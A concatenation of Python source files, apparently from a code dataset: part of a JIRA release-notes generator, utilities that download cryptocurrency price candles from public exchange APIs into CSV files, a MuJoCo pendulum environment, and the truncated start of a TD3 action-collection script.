". " + "'all' enables all lint filters. " +
"Multiple filters can be specified comma-delimited and " +
"filters can be negated, e.g. 'all,-component'.")
def _parse_options(self, options):
"""Parse options from optparse."""
if options.lint is None or len(options.lint) == 0:
return
self.enabled = True
# Valid filter specifications are
# self._valid_filters, negations, and "all"
valid_list = self._valid_filters
valid_list += ["-" + v for v in valid_list]
valid_list += ["all"]
valid = set(valid_list)
enabled = []
disabled = []
for o in options.lint:
for token in o.split(","):
if token not in valid:
print "Unknown lint filter '%s', valid options are: %s" % \
(token, ", ".join(v for v in sorted(valid)))
sys.exit(1)
if token.startswith("-"):
disabled.append(token[1:])
else:
enabled.append(token)
for e in enabled:
if e == "all":
for f in self._valid_filters:
self._filters[f] = True
else:
self._filters[e] = True
for d in disabled:
self._filters[d] = False
def had_errors(self):
"""Returns True if a lint error was encountered, else False."""
return self._error_count > 0
def message(self):
"""Return summary lint message suitable for printing to stdout."""
if not self.enabled:
return
return self._lint_message + \
"\n=======================================" + \
"\n%s: Error:%d, Warning:%d \n" % \
(self._version, self._error_count, self._warning_count)
def _check_missing_component(self, jira):
"""Return if JIRA has a 'missing component' lint error."""
if not self._filters["component"]:
return False
if len(jira.fields['components']) > 0:
return False
return True
def _check_missing_assignee(self, jira):
"""Return if JIRA has a 'missing assignee' lint error."""
if not self._filters["assignee"]:
return False
if jira.fields['assignee'] is not None:
return False
return True
def _check_version_string(self, jira):
"""Return if JIRA has a version string lint error."""
if not self._filters["version"]:
return False
field = jira.parent.field_id_map['Fix Version/s']
for ver in jira.fields[field]:
found = re.match(r'^((\d+)(\.\d+)*).*$|^(\w+\-\d+)$', ver['name'])
if not found:
return True
return False
def lint(self, jira):
"""Run lint check on a JIRA."""
if not self.enabled:
return
if len(jira.get_release_note()) == 0:
if self._filters["incompatible"] and jira.get_incompatible_change():
self._warning_count += 1
self._lint_message += "\nWARNING: incompatible change %s lacks release notes." % \
(sanitize_text(jira.get_id()))
if self._filters["important"] and jira.get_important():
self._warning_count += 1
self._lint_message += "\nWARNING: important issue %s lacks release notes." % \
(sanitize_text(jira.get_id()))
if self._check_version_string(jira):
self._warning_count += 1
self._lint_message += "\nWARNING: Version string problem for %s " % jira.get_id(
)
if self._check_missing_component(jira) or self._check_missing_assignee(
jira):
self._error_count += 1
error_message = []
if self._check_missing_component(jira):
error_message.append("component")
if self._check_missing_assignee(jira):
error_message.append("assignee")
self._lint_message += "\nERROR: missing %s for %s " \
% (" and ".join(error_message), jira.get_id())
def parse_args():
"""Parse command-line arguments with optparse."""
usage = "usage: %prog [OPTIONS] " + \
"--project PROJECT [--project PROJECT] " + \
"--version VERSION [--version VERSION2 ...]"
parser = OptionParser(
usage=usage,
epilog=
"Markdown-formatted CHANGES and RELEASENOTES files will be stored"
" in a directory named after the highest version provided.")
parser.add_option("-i",
"--index",
dest="index",
action="store_true",
default=False,
help="build an index file")
parser.add_option("-l",
"--license",
dest="license",
action="store_true",
default=False,
help="Add an ASF license")
parser.add_option("-p",
"--project",
dest="projects",
action="append",
type="string",
help="projects in JIRA to include in releasenotes",
metavar="PROJECT")
parser.add_option("-r",
"--range",
dest="range",
action="store_true",
default=False,
help="Given versions are a range")
parser.add_option(
"--sortorder",
dest="sortorder",
metavar="TYPE",
default=SORTORDER,
# dec is supported for backward compatibility
choices=["asc", "dec", "desc", "newer", "older"],
help="Sorting order for sort type (default: %s)" % SORTORDER)
parser.add_option("--sorttype",
dest="sorttype",
metavar="TYPE",
default=SORTTYPE,
choices=["resolutiondate", "issueid"],
help="Sorting type for issues (default: %s)" % SORTTYPE)
parser.add_option(
"-t",
"--projecttitle",
dest="title",
type="string",
help="Title to use for the project (default is Apache PROJECT)")
parser.add_option("-u",
"--usetoday",
dest="usetoday",
action="store_true",
default=False,
help="use current date for unreleased versions")
parser.add_option("-v",
"--version",
dest="versions",
action="append",
type="string",
help="versions in JIRA to include in releasenotes",
metavar="VERSION")
parser.add_option(
"-V",
dest="release_version",
action="store_true",
default=False,
help="display version information for releasedocmaker and exit.")
parser.add_option("-O",
"--outputdir",
dest="output_directory",
action="append",
type="string",
help="specify output directory to put release docs to.")
parser.add_option("-B",
"--baseurl",
dest="base_url",
action="append",
type="string",
help="specify base URL of the JIRA instance.")
parser.add_option(
"--retries",
dest="retries",
action="append",
type="int",
help="Specify how many times to retry connection for each URL.")
parser.add_option("-X",
"--incompatiblelabel",
dest="incompatible_label",
default="backward-incompatible",
type="string",
help="Specify the label to indicate backward incompatibility.")
Linter.add_parser_options(parser)
if len(sys.argv) <= 1:
parser.print_help()
sys.exit(1)
(options, _) = parser.parse_args()
# Validate options
if not options.release_version:
if options.versions is None:
parser.error("At least one version needs to be supplied")
if options.projects is None:
parser.error("At least one project needs to be supplied")
if options.base_url is not None:
if len(options.base_url) > 1:
parser.error("Only one base URL should be given")
else:
options.base_url = options.base_url[0]
if options.output_directory is not None:
if len(options.output_directory) > 1:
parser.error("Only one output directory should be given")
else:
options.output_directory = options.output_directory[0]
return options
def main():
options = parse_args()
if options.release_version:
with open(
os.path.join(
os.path.dirname(__file__), "../VERSION"), 'r') as ver_file:
print ver_file.read()
sys.exit(0)
if options.output_directory is not None:
# Create the output directory if it does not exist.
# Equivalent to `mkdir -p`.
try:
os.makedirs(options.output_directory)
except OSError as exc:
if exc.errno == errno.EEXIST and os.path.isdir(
options.output_directory):
pass
else:
print "Unable to create output directory %s: %s" % \
(options.output_directory, exc.message)
sys.exit(1)
os.chdir(options.output_directory)
if options.base_url is not None:
global JIRA_BASE_URL
JIRA_BASE_URL = options.base_url
if options.incompatible_label is not None:
global BACKWARD_INCOMPATIBLE_LABEL
BACKWARD_INCOMPATIBLE_LABEL = options.incompatible_label
proxy = urllib2.ProxyHandler()
opener = urllib2.build_opener(proxy)
urllib2.install_opener(opener)
projects = options.projects
if options.range is True:
versions = [Version(v)
for v in GetVersions(options.versions, projects).getlist()]
else:
versions = [Version(v) for v in options.versions]
versions.sort()
global SORTTYPE
SORTTYPE = options.sorttype
global SORTORDER
SORTORDER = options.sortorder
if options.title is None:
title = projects[0]
else:
title = options.title
if options.retries is not None:
global NUM_RETRIES
NUM_RETRIES = options.retries[0]
haderrors = False
for version in versions:
vstr = str(version)
linter = Linter(vstr, options)
jlist = sorted(JiraIter(vstr, projects))
if len(jlist) == 0:
print "There is no issue which has the specified version: %s" % version
continue
if vstr in RELEASE_VERSION:
reldate = RELEASE_VERSION[vstr]
elif options.usetoday:
reldate = strftime("%Y-%m-%d", gmtime())
else:
reldate = "Unreleased (as of %s)" % strftime("%Y-%m-%d", gmtime())
if not os.path.exists(vstr):
os.mkdir(vstr)
reloutputs = Outputs("%(ver)s/RELEASENOTES.%(ver)s.md",
"%(ver)s/RELEASENOTES.%(key)s.%(ver)s.md", [],
{"ver": version,
"date": reldate,
"title": title})
choutputs = Outputs("%(ver)s/CHANGES.%(ver)s.md",
"%(ver)s/CHANGES.%(key)s.%(ver)s.md", [],
{"ver": version,
"date": reldate,
"title": title})
if options.license is True:
reloutputs.write_all(ASF_LICENSE)
choutputs.write_all(ASF_LICENSE)
relhead = '# %(title)s %(key)s %(ver)s Release Notes\n\n' \
'These release notes cover new developer and user-facing ' \
'incompatibilities, important issues, features, and major improvements.\n\n'
chhead = '# %(title)s Changelog\n\n' \
'## Release %(ver)s - %(date)s\n'\
'\n'
reloutputs.write_all(relhead)
choutputs.write_all(chhead)
incompatlist = []
importantlist = []
buglist = []
improvementlist = []
newfeaturelist = []
subtasklist = []
tasklist = []
testlist = []
otherlist = []
for jira in jlist:
if jira.get_incompatible_change():
incompatlist.append(jira)
elif jira.get_important():
importantlist.append(jira)
elif jira.get_type() == "Bug":
buglist.append(jira)
elif jira.get_type() == "Improvement":
improvementlist.append(jira)
elif jira.get_type() == "New Feature":
newfeaturelist.append(jira)
elif jira.get_type() == "Sub-task":
subtasklist.append(jira)
elif jira.get_type() == "Task":
tasklist.append(jira)
elif jira.get_type() == "Test":
testlist.append(jira)
else:
otherlist.append(jira)
line = '* [%s](' % (sanitize_text(jira.get_id())) + JIRA_BASE_URL + \
'/browse/%s) | *%s* | **%s**\n' \
% (sanitize_text(jira.get_id()),
sanitize_text(jira.get_priority()), sanitize_text(jira.get_summary()))
if len(jira.get_release_note()) > 0 or \
jira.get_incompatible_change() or jira.get_important():
reloutputs.write_key_raw(jira.get_project(), "\n---\n\n")
reloutputs.write_key_raw(jira.get_project(), line)
if len(jira.get_release_note()) == 0:
line = '\n**WARNING: No release note provided for this change.**\n\n'
else:
line = '\n%s\n\n' % (
processrelnote(jira.get_release_note()))
reloutputs.write_key_raw(jira.get_project(), line)
linter.lint(jira)
if linter.enabled:
print linter.message()
if linter.had_errors():
haderrors = True
shutil.rmtree(vstr)
continue
reloutputs.write_all("\n\n")
reloutputs.close()
if incompatlist:
choutputs.write_all("### INCOMPATIBLE CHANGES:\n\n")
choutputs.write_all(CHANGEHDR1)
choutputs.write_all(CHANGEHDR2)
choutputs.write_list(incompatlist)
if importantlist:
choutputs.write_all("\n\n### IMPORTANT ISSUES:\n\n")
choutputs.write_all(CHANGEHDR1)
choutputs.write_all(CHANGEHDR2)
choutputs.write_list(importantlist)
if newfeaturelist:
choutputs.write_all("\n\n### NEW FEATURES:\n\n")
choutputs.write_all(CHANGEHDR1)
choutputs.write_all(CHANGEHDR2)
choutputs.write_list(newfeaturelist)
if improvementlist:
choutputs.write_all("\n\n### IMPROVEMENTS:\n\n")
choutputs.write_all(CHANGEHDR1)
choutputs.write_all(CHANGEHDR2)
choutputs.write_list(improvementlist)
if buglist:
choutputs.write_all("\n\n### BUG FIXES:\n\n")
choutputs.write_all(CHANGEHDR1)
choutputs.write_all(CHANGEHDR2)
choutputs.write_list(buglist)
if testlist:
choutputs.write_all("\n\n### TESTS:\n\n")
choutputs.write_all(CHANGEHDR1)
choutputs.write_all(CHANGEHDR2)
choutputs.write_list(testlist)
if subtasklist:
choutputs.write_all("\n\n### SUB-TASKS:\n\n")
choutputs.write_all(CHANGEHDR1)
choutputs.write_all(CHANGEHDR2)
choutputs.write_list(subtasklist)
if tasklist or otherlist:
choutputs.write_all("\n\n### OTHER:\n\n")
choutputs.write_all(CHANGEHDR1)
choutputs.write_all(CHANGEHDR2)
choutputs.write_list(otherlist)
choutputs.write_list(tasklist)
choutputs.write_all("\n\n")
choutputs.close()
if options.index:
buildindex(title, options.license)
buildreadme(title, options.license)
if haderrors is True:
sys.exit(1)
if __name__ == "__main__":
main()
``` |
{
"source": "JiazhengChai/cryptoData",
"score": 3
} |
#### File: JiazhengChai/cryptoData/utils.py
```python
import os
import csv
import json
import time
import pytz
import requests
import dateparser
import datetime as dt
from binance.client import Client
from datetime import datetime, timedelta
cur_path=os.path.abspath(os.getcwd())
data_folder = os.path.join(cur_path, "data")
if not os.path.exists(data_folder):
os.makedirs(data_folder)
int_to_month_dict = {
1: "Jan", 2: "Feb", 3: "March", 4: "Apr", 5: "May", 6: "June", 7: "July", 8: "Aug", 9: "Sep", 10: "Oct", 11: "Nov",
12: "Dec"
}
bybit_root_url = 'https://api.bybit.com/'
bitbank_root_url = 'https://public.bitbank.cc'
bitstamp_root_url = 'https://www.bitstamp.net/api/v2/ohlc'
binance_spot_url = 'https://api.binance.com/api/v3/klines'
binance_delivery_url='https://dapi.binance.com/dapi/v1/klines'
bitfinex_root_url = 'https://api-pub.bitfinex.com/v2/candles/trade:'
poloniex_root_url = "https://poloniex.com/public?command=returnChartData&"
def date_to_milliseconds(date_str):
"""Convert UTC date to milliseconds
:param date_str: date in readable format, i.e. "January 01, 2018", "11 hours ago UTC", "now UTC"
:type date_str: str
"""
# get epoch value in UTC
epoch = datetime.utcfromtimestamp(0).replace(tzinfo=pytz.utc)
# parse our date string
d = dateparser.parse(date_str)
# if the date is not timezone aware apply UTC timezone
if d.tzinfo is None or d.tzinfo.utcoffset(d) is None:
d = d.replace(tzinfo=pytz.utc)
# return the difference in time
return int((d - epoch).total_seconds() * 1000.0)
def date_to_utc(date_str):
"""Convert date to UTC
:param date_str: date in readable format, i.e. "January 01, 2018", "11 hours ago UTC", "now UTC"
:type date_str: str
"""
# get epoch value in UTC
epoch = datetime.utcfromtimestamp(0).replace(tzinfo=pytz.utc)
# parse our date string
d = dateparser.parse(date_str)
# if the date is not timezone aware apply UTC timezone
if d.tzinfo is None or d.tzinfo.utcoffset(d) is None:
d = d.replace(tzinfo=pytz.utc)
# return the difference in time
return int((d - epoch))
def interval_to_milliseconds(interval):
"""Convert a interval string to milliseconds
:param interval: interval string 1m, 3m, 5m, 15m, 30m, 1h, 2h, 4h, 6h, 8h, 12h, 1d, 3d, 1w
:type interval: str
:return:
None if unit not one of m, h, d or w
None if string not in correct format
int value of interval in milliseconds
"""
ms = None
seconds_per_unit = {
"m": 60,
"h": 60 * 60,
"d": 24 * 60 * 60,
"w": 7 * 24 * 60 * 60
}
unit = interval[-1]
if unit in seconds_per_unit:
try:
ms = int(interval[:-1]) * seconds_per_unit[unit] * 1000
except ValueError:
pass
return ms
def binance_get_historical_klines_to_csv(csv_name,base,quote, interval, start_str, end_str=None):
base=base.upper()
quote=quote.upper()
if quote=="USD":
quote=quote+"T"
symbol=base+quote
my_csv = open(csv_name, 'w')
writer = csv.writer(my_csv, lineterminator='\n')
writer.writerow(['Date', 'Open', 'High', 'Low', 'Close', 'Volume'])
client = Client("", "")
limit = 500
timeframe = interval_to_milliseconds(interval)
start_ts = date_to_milliseconds(start_str)
end_ts = None
if end_str:
end_ts = date_to_milliseconds(end_str)
idx = 0
symbol_existed = False
while True:
temp_data = client.get_klines(
symbol=symbol,
interval=interval,
limit=limit,
startTime=start_ts,
endTime=end_ts
)
if not symbol_existed and len(temp_data):
symbol_existed = True
if symbol_existed:
for i in range(len(temp_data)):
date = dt.datetime.fromtimestamp(temp_data[i][0] / 1000.0)
op = temp_data[i][1]
hi = temp_data[i][2]
lo = temp_data[i][3]
cl = temp_data[i][4]
v = temp_data[i][5]
writer.writerow( [date, op,hi , lo,cl, v])
print(date)
start_ts = temp_data[len(temp_data) - 1][0] + timeframe
else:
print("Symbol not yet available. Increasing query start time...")
start_ts += timeframe
idx += 1
if len(temp_data) < limit:
break
if idx % 3 == 0:
time.sleep(1)
def binance_delivery_get_historical_klines_to_csv(csv_name,base,quote, interval, start_str, end_str=None):
base=base.upper()
quote=quote.upper()
symbol=base+"USD_PERP"
my_csv = open(csv_name, 'w')
writer = csv.writer(my_csv, lineterminator='\n')
writer.writerow(['Date', 'Open', 'High', 'Low', 'Close', 'Volume'])
client = Client("", "")
limit = 500
timeframe = interval_to_milliseconds(interval)
start_ts = date_to_milliseconds(start_str)
end_ts = None
if end_str:
end_ts = date_to_milliseconds(end_str)
idx = 0
symbol_existed = False
while True:
temp_data=client._request('get', 'https://dapi.binance.com/dapi/v1/klines', False, True,
params={
'symbol':symbol,
'interval':interval,
'limit':limit,
'startTime':start_ts,
'endTime':start_ts+(limit-1)*timeframe
})
if not symbol_existed and len(temp_data):
symbol_existed = True
if symbol_existed:
for i in range(len(temp_data)):
date = dt.datetime.fromtimestamp(temp_data[i][0] / 1000.0)
op = temp_data[i][1]
hi = temp_data[i][2]
lo = temp_data[i][3]
cl = temp_data[i][4]
v = temp_data[i][5]
writer.writerow( [date, op,hi , lo,cl, v])
print(date)
start_ts = start_ts + (limit) * timeframe
if(end_ts <= start_ts):
break
if(end_ts < start_ts+(limit)*timeframe):
limit=1+(end_ts-start_ts)//timeframe
else:
print("Symbol not yet available for the requested dates.")
start_ts += timeframe
idx += 1
if len(temp_data) < limit:
break
if idx % 3 == 0:
time.sleep(1)
def bitstamp_get_historical_klines_to_csv(csv_name,base,quote, interval, start_str, end_str=None):
# bitstamp
available_pairs=["btcusd", "btceur", "btcgbp", "btcpax", "gbpusd",
"gbpeur", "eurusd", "xrpusd", "xrpeur", "xrpbtc",
"xrpgbp", "xrppax", "ltcusd", "ltceur", "ltcbtc",
"ltcgbp", "ethusd", "etheur", "ethbtc", "ethgbp",
"ethpax", "bchusd", "bcheur", "bchbtc", "bchgbp", "paxusd",
"paxeur", "paxgbp", "xlmbtc", "xlmusd", "xlmeur", "xlmgbp"]
base=base.lower()
quote=quote.lower()
symbol=base+quote
if symbol not in available_pairs:
print("Requested symbol not available in Bitstamp.")
print("Please select from: ")
print(available_pairs)
quit()
def bitstamp_get_bars(symbol, interval=86400, start=None, end=None, limit=500):
url = bitstamp_root_url + '/' + symbol + '?step=' + str(interval) + '&limit=' + str(limit)
if start:
url = url + '&start=' + str(start)
if end:
url = url + '&end=' + str(end)
data = json.loads(requests.get(url).text)
return data
my_csv = open(csv_name, 'w')
writer = csv.writer(my_csv, lineterminator='\n')
writer.writerow(['Date', 'Open', 'High', 'Low', 'Close', 'Volume'])
limit = 500
timeframe = interval_to_milliseconds(interval)
timeframe=int(timeframe/1000)
start_ts = date_to_milliseconds(start_str)
start_ts=int(start_ts/1000)-timeframe
end_ts = None
if end_str:
end_ts = date_to_milliseconds(end_str)
end_ts = int(end_ts / 1000)
else:
end_ts=start_ts+500*timeframe#60
cur_start=start_ts
cur_end=end_ts
if (end_ts-start_ts)/timeframe >500:
cur_end=cur_start+500*timeframe
idx = 0
symbol_existed = False
while True:
temp_data=bitstamp_get_bars(symbol, interval = timeframe,start=cur_start ,end=cur_end,limit=int((cur_end-cur_start)/timeframe) )
temp_data=temp_data["data"]["ohlc"]
if not symbol_existed and len(temp_data):
symbol_existed = True
if symbol_existed:
for i in range(len(temp_data)):
date = dt.datetime.fromtimestamp(int(temp_data[i]["timestamp"]))
op = temp_data[i]["open"]
hi = temp_data[i]["high"]
lo = temp_data[i]["low"]
cl = temp_data[i]["close"]
v = temp_data[i]["volume"]
writer.writerow( [date, op,hi , lo,cl, v])
if(cur_end==end_ts):
break
cur_start = int(temp_data[len(temp_data) - 1]["timestamp"]) + timeframe
cur_end=cur_start+500*timeframe
if(cur_end>end_ts):
cur_end=end_ts
else:
print("Symbol not yet available. Increasing query start time...")
start_ts += timeframe
idx += 1
if len(temp_data) < limit:
break
if idx % 3 == 0:
time.sleep(1)
def poloniex_get_historical_klines_to_csv(csv_name,base,quote, interval, start_str, end_str=None):
try:
assert interval in ["5m","15m","30m","2h","4h","1d"]
except:
print("For poloniex, only the following timeframes are available.")
print(["5m","15m","30m","2h","4h","1d"])
quit()
base=base.upper()
quote=quote.upper()
if quote=="USD":
quote=quote+"T"
symbol=quote+"_"+base
def poloniex_get_bars(symbol, interval=5, start=None, end=None):
url = poloniex_root_url + "currencyPair=" + symbol + '&start=' + str(start) + '&end=' + str(
end) + "&period=" + str(interval) + "&resolution=auto"
data = json.loads(requests.get(url).text)
return data
my_csv = open(csv_name, 'w')
writer = csv.writer(my_csv, lineterminator='\n')
writer.writerow(['Date', 'Open', 'High', 'Low', 'Close', 'Volume'])
limit = 10000
timeframe = interval_to_milliseconds(interval)
timeframe=int(timeframe/1000)
start_ts = date_to_milliseconds(start_str)
start_ts=int(start_ts/1000)
end_ts = None
if end_str:
end_ts = date_to_milliseconds(end_str)
end_ts = int(end_ts / 1000)
else:
end_ts=start_ts+limit*timeframe
cur_start=start_ts
cur_end=end_ts
if (end_ts-start_ts)/timeframe >limit:
cur_end=cur_start+limit*timeframe
idx = 0
symbol_existed = False
prev_time=0
while True:
temp_data=poloniex_get_bars(symbol, interval = timeframe,start=cur_start ,end=cur_end)
#print(len(temp_data))
if not symbol_existed and len(temp_data):
symbol_existed = True
if symbol_existed:
for i in range(len(temp_data)):
date = dt.datetime.fromtimestamp(int(temp_data[i]["date"]))
if i==0 :
print(date)
if prev_time!=0 :
if((int(temp_data[i]["date"]-prev_time)!=300)):
print("TIME DECALAGE.")
if i==len(temp_data)-1:
print(date)
prev_time=int(temp_data[i]["date"])
op = temp_data[i]["open"]
hi = temp_data[i]["high"]
lo = temp_data[i]["low"]
cl = temp_data[i]["close"]
v = temp_data[i]["volume"]
writer.writerow( [date, op,hi , lo,cl, v])
if(cur_end==end_ts):
break
cur_start = int(temp_data[len(temp_data) - 1]["date"]) + timeframe
cur_end=cur_start+limit*timeframe
if(cur_end>end_ts):
cur_end=end_ts
else:
print("Symbol not yet available. Increasing query start time...")
start_ts += timeframe
idx += 1
if idx % 3 == 0:
time.sleep(1)
def bitfinex_get_historical_klines_to_csv(csv_name,base,quote, interval, start_str, end_str=None):
try:
assert interval in ['1m', '5m', '15m', '30m', '1h', '3h', '6h', '12h', '1d', '7d', '14d']
except:
print("For poloniex, only the following timeframes are available.")
print(['1m', '5m', '15m', '30m', '1h', '3h', '6h', '12h', '1d', '7d', '14d'])
quit()
base = base.upper()
quote = quote.upper()
if quote == "USDT":
quote = "USD"
symbol = base + quote
def bitfinex_get_bars(symbol, tf, start=None, end=None, limit=10000):
tf_min=tf // 60000
time_symbol="m"
if tf_min >= 1440:
tf_min=tf_min//1440
time_symbol = "D"
elif tf_min>=60:
tf_min=tf_min//60
time_symbol = "h"
url = bitfinex_root_url + str(tf_min) + time_symbol+":t" + symbol + "/hist?" + '&start=' + str(
start) + '&end=' + str(end) + \
"&limit=" + str(limit) + "&sort=1"
data = json.loads(requests.get(url).text)
return data
my_csv = open(csv_name, 'w')
writer = csv.writer(my_csv, lineterminator='\n')
writer.writerow(['Date', 'Open', 'High', 'Low', 'Close', 'Volume'])
limit = 10000
timeframe = interval_to_milliseconds(interval)
timeframe=int(timeframe)
start_ts = date_to_milliseconds(start_str)
start_ts=int(start_ts)
end_ts = None
if end_str:
end_ts = date_to_milliseconds(end_str)
end_ts =int(end_ts)
else:
end_ts=start_ts+limit*timeframe
cur_start=start_ts
cur_end=end_ts
if (end_ts-start_ts)/timeframe >limit:
cur_end=cur_start+limit*timeframe
idx = 0
symbol_existed = False
start=time.time()
prev_time=0
while True:
temp_data=bitfinex_get_bars(symbol, tf = timeframe,start=cur_start ,end=cur_end,limit=limit)
#print(len(temp_data))
if not symbol_existed and len(temp_data):
symbol_existed = True
if symbol_existed:
for i in range(len(temp_data)):
date = dt.datetime.fromtimestamp(int(temp_data[i][0]/1000))
if i == 0:
print(date)
if prev_time != 0:
if ((int(temp_data[i][0] - prev_time) != 300000)):
print("TIME DECALAGE.")
if i == len(temp_data) - 1:
print(date)
prev_time = int(temp_data[i][0])
op = temp_data[i][1]
hi = temp_data[i][3]
lo = temp_data[i][4]
cl = temp_data[i][2]
v = temp_data[i][5]
writer.writerow( [date, op,hi , lo,cl, v])
if(cur_end==end_ts):
break
try:
cur_start = int(temp_data[len(temp_data) - 1][0]) + timeframe
except:
print("wait")
cur_end=cur_start+limit*timeframe
if(cur_end>end_ts):
cur_end=end_ts
else:
print("Symbol not yet available. Increasing query start time...")
start_ts += timeframe
idx += 1
if idx % 3 == 0:
time.sleep(1)
def bybit_get_historical_klines_to_csv(csv_name,base,quote, interval, start_str, end_str=None):
base = base.upper()
quote = quote.upper()
symbol = base + quote
try:
if quote=="USD":
assert base in ["BTC","ETH","XRP","EOS"]
elif quote=="USDT":
assert base in ["BTC","ETH","LTC","BCH","LINK","XTZ"]
except:
print(symbol+" does not exist in Bybit.")
print("Try changing the quote currency to 'USD' or 'USDT'")
quit()
def bybit_get_bars(symbol, interval=5, start=None, limit=200):
if "USDT" in symbol:
url = bybit_root_url + "public/linear/kline?symbol=" + symbol + "&interval=" + str(
interval) + "&limit=" + str(limit) + "&from=" + str(start)
else:
url = bybit_root_url + "v2/public/kline/list?symbol=" + symbol + "&interval=" + str(
interval) + "&limit=" + str(limit) + "&from=" + str(start)
data = json.loads(requests.get(url).text)
return data
my_csv = open(csv_name, 'w')
writer = csv.writer(my_csv, lineterminator='\n')
writer.writerow(['Date', 'Open', 'High', 'Low', 'Close', 'Volume'])
limit = 200
if "m" in interval:
interval_num=int(interval.replace("m",""))
elif "h" in interval:
hour=int(interval.replace("h",""))
interval_num=hour*60
else:
interval_num = interval[-1].upper()
timeframe = interval_to_milliseconds(interval)
timeframe=int(timeframe/1000)
start_ts = date_to_milliseconds(start_str)
start_ts=int(start_ts/1000)
end_ts = None
if end_str:
end_ts = date_to_milliseconds(end_str)
end_ts = int(end_ts / 1000)
if interval!="5m":
end_ts=end_ts+timeframe
else:
end_ts=start_ts+limit*timeframe
cur_start=start_ts
cur_end=end_ts
if (end_ts-start_ts)/timeframe >limit:
cur_end=cur_start+limit*timeframe
idx = 0
symbol_existed = False
while True:
temp_data=bybit_get_bars(symbol, interval = interval_num,start=cur_start,limit=int((cur_end-cur_start)/timeframe))
temp_data=temp_data["result"]
if not temp_data:
print("Cannot query data for the current input parameters.")
exit()
if not symbol_existed and len(temp_data):
symbol_existed = True
if symbol_existed:
for i in range(len(temp_data)):
date = dt.datetime.fromtimestamp(int(temp_data[i]["open_time"]))
op = temp_data[i]["open"]
hi = temp_data[i]["high"]
lo = temp_data[i]["low"]
cl = temp_data[i]["close"]
v = temp_data[i]["volume"]
writer.writerow( [date, op,hi , lo,cl, v])
print(date)
if (cur_end >= end_ts):
break
cur_start = int(temp_data[len(temp_data) - 1]["open_time"]) + timeframe
cur_end=cur_start+limit*timeframe
if(cur_end>end_ts):
cur_end=end_ts+timeframe
else:
print("Symbol not yet available. Increasing query start time...")
start_ts += timeframe
idx += 1
if len(temp_data) < limit:
break
if idx % 3 == 0:
time.sleep(1)
def bitbank_get_historical_klines_to_csv(csv_name,base,quote, interval, start_str, end_str=None):
base = base.lower()
quote = quote.lower()
if quote in ["usd","usdt"]:
symbol = base + "_jpy"
else:
symbol = base + quote
if "min" not in interval and "m" in interval:
interval=interval+"in"
def bitbank_get_bars(symbol, ymd, interval="5min"):
url = bitbank_root_url + "/" + symbol + "/candlestick/" + interval + "/" + ymd
data = json.loads(requests.get(url).text)
return data
my_csv = open(csv_name, 'w')
writer = csv.writer(my_csv, lineterminator='\n')
writer.writerow(['Date', 'Open', 'High', 'Low', 'Close', 'Volume'])
if "min" not in interval:
print("Only minutes interval supported now.")
print("Exiting.")
exit()
interval_unit=int(interval.replace("min",""))
idx = 0
def daterange(start_date, end_date):
for n in range(int((end_date - start_date).days)):
yield start_date + timedelta(n)
try:
sd = datetime.strptime(start_str, '%B %d, %Y')
ed = datetime.strptime(end_str, '%B %d, %Y')
except:
sd = datetime.strptime(start_str, '%b %d, %Y')
ed = datetime.strptime(end_str, '%b %d, %Y')
for single_date in daterange(sd, ed):
ymd=single_date.strftime("%Y%m%d")
temp_data=bitbank_get_bars(symbol, ymd=ymd,interval =interval)
data=temp_data["data"]["candlestick"][0]["ohlcv"]
#print(len(data))
start_h=9
start_m=0
today_date=single_date
for i in range(len(data)):
if(start_m==0):
date = today_date.strftime('%Y-%m-%d') + " " + str(start_h) + ":00:00"
else:
date = today_date.strftime('%Y-%m-%d') + " " + str(start_h) + ":" + str(start_m)+ ":00"
if i==0:
print(date)
op = data[i][0]
hi = data[i][1]
lo = data[i][2]
cl = data[i][3]
v = data[i][4]
writer.writerow( [date, op,hi , lo,cl, v])
start_m=start_m+interval_unit
if(start_m==60):
start_m=0
start_h=(start_h+1)
if(start_h==24):
start_h=0
today_date= today_date+ timedelta(1)
idx += 1
if idx % 100 == 0:
time.sleep(1)
``` |
{
"source": "JiazhengChai/spinningup_pytorch",
"score": 2
} |
#### File: spinningup_pytorch/assets/vertical_mvt_pendulum.py
```python
import numpy as np
from gym import utils
from gym.envs.mujoco import mujoco_env
import os
TARGET_ENERGY=3
class VerticalMvtPendulumEnv(mujoco_env.MujocoEnv, utils.EzPickle):
def __init__(self,type='vertical_mvt_pendulum.xml',path=None,target_energy=TARGET_ENERGY):
self.target_energy=target_energy
self.before_init=True
if path:
mujoco_env.MujocoEnv.__init__(self, os.path.join(path,type), 2)
else:
try:
mujoco_env.MujocoEnv.__init__(self, 'vertical_mvt_pendulum.xml', 2)
except:
print('Error.')
print('Please specify the folder in which the '+type+ ' can be found.')
exit()
utils.EzPickle.__init__(self)
self.before_init =False
def step(self, action):
z_before=self.sim.data.qpos[0]
self.do_simulation(action, self.frame_skip)
z_after = self.sim.data.qpos[0]
ob = self._get_obs()
a_energy_penalty=np.squeeze(np.abs(z_after-z_before)*np.abs(action))
stick_energy=np.abs(0.0417*ob[4])*ob[4]+4.905*(1-ob[2])
alive_bonus = 10
r= -(self.target_energy-stick_energy)**2 +alive_bonus - 0.01 * ob[0]** 2 - 0.01*a_energy_penalty
if self.before_init:
done = bool(ob[2] < 0)
else:
done = bool(ob[2] < 0 or np.abs(ob[4])<0.0001)
#done=False
return ob, r, done, {'actuator penalty':a_energy_penalty,'stick energy':stick_energy,'delta target energy':np.abs(self.target_energy-stick_energy)}
def _get_obs(self):
return np.concatenate([
self.sim.data.qpos[:1], # cart x pos
np.sin(self.sim.data.qpos[1:]), # link angles
np.cos(self.sim.data.qpos[1:]),
np.clip(self.sim.data.qvel, -10, 10),
np.clip(self.sim.data.qfrc_constraint, -10, 10)
]).ravel()
def reset_model(self):
self.set_state(
self.init_qpos + self.np_random.uniform(low=-.1, high=.1, size=self.model.nq),
self.init_qvel + self.np_random.randn(self.model.nv) * .1
)
return self._get_obs()
def viewer_setup(self):
v = self.viewer
v.cam.trackbodyid = 0
v.cam.distance = self.model.stat.extent * 0.3
v.cam.lookat[0] = 0
v.cam.lookat[1] = -1
v.cam.lookat[2] = 0
v.cam.elevation = 0
``` |
{
"source": "JiazhengChai/synergy_analysis",
"score": 2
} |
#### File: examples/development_TD3/collect_actions_TD3.py
```python
import argparse
from distutils.util import strtobool
import json
import os
import pickle
from collections import OrderedDict
import tensorflow as tf
import numpy as np
from softlearning.policies.utils import get_policy_from_variant
from softlearning.samplers import rollouts,my_rollouts
speed_dict={
"v1":0.5,
"v2":1,
"v25": 1,
"v3":2,
"v4":3,
"v45": 3,
"v5":4,
"v6":5,
"v65": 5,
}
def parse_args():
